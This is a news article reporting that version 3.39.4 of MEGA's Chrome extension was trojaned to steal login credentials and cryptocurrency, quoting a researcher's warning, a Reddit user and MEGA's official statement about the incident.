The Mega Chrome Extension 3.39.4 has been compromised and capable of stealing usernames and passwords. This was revealed by SerHack, a security specialist who made a tweet alerting internet users of the risk posed.
The specialist said:
“!!! WARNING !!!!!!! PLEASE PAY ATTENTION!!
LATEST VERSION OF MEGA CHROME EXTENSION WAS HACKED.
Version: 3.39.4
It catches your username and password from Amazon, GitHub, Google, Microsoft portals!! It could catch #mega #extension #hacked@x0rz”
The information spread like wildfire especially after the official Monero Twitter account posted it saying that hacker could steal Monero (XMR) using the Mega Chrome Extension. The Monero tweet:
“PSA: The official MEGA extension has been compromised and now includes functionality to steal your Monero: https://www.reddit.com/r/Monero/comments/9cx7cc/dont_use_mega_chrome_extension_version_3394/ …”
That the Monero network was concerned is not surprising. Not just is the coin a prime target, Monero has been preferred by cyber criminals due to its privacy features that enable them to effectively hide transactions. In fact, between January and July, malicious crypto mining activities utilizing scripts embedded on websites to exploit processors have been targeted towards Monero (XMR).
A Reddit post said that the latest update to the Mega Chrome Extension asked for some suspicious permission prompting them to manually check the code and discovered that there was no commit. According to the Reddit post, the most probable explanation is a hack or a developer with Mega was involved.
In the post the Redditor wrote,
“There was an update to the extension and Chrome asked for new permission (read data on all websites). That made me suspicious and I checked the extension code locally (which is mostly Javascript anyways). MEGA also has the source code of the extension on GitHub […] There was no commit recently. To me it looks either their Google Webstore account was hacked or someone inside MEGA did this. Pure speculation though.”
The Mega file upload and sharing service was first launched in 2013 by Kim Dotcom. The compromised version has been programmed to monitor web activity of users such as URLs and login details. These data are then sent to a yet-to-be-identified host in Ukraine at www.megaopac.host which has now been identified as a phishing site.
The malicious code is particularly interested in URLs that are linked to cryptocurrencies and when it correlates login details with these sites, tried to steal the digital currencies of such users by executing a Javascript function.
In a statement about the hack, Mega stated,
“On 4 September 2018 at 14:30 UTC, an unknown attacker uploaded a trojaned version of MEGA’s Chrome extension, version 3.39.4, to the Google Chrome webstore. Upon installation or autoupdate, it would ask for elevated permissions (Read and change all your data on the websites you visit) that MEGA’s real extension does not require and would (if permissions were granted) exfiltrate credentials for sites including amazon.com, live.com, github.com, google.com (for webstore login), myetherwallet.com, mymonero.com, idex.market and HTTP POST requests to other sites, to a server located in Ukraine. Note that mega.nz credentials were not being exfiltrated.”
As at the time of filing this report the compromised version of the Mega Chrome Extension is no longer available for download. This did not stop Mega from blaming Google for removing their ability to sign extensions thereby making such hacks possible.
SerHack advises users to uninstall the Mega’s 3.39.4 immediately.
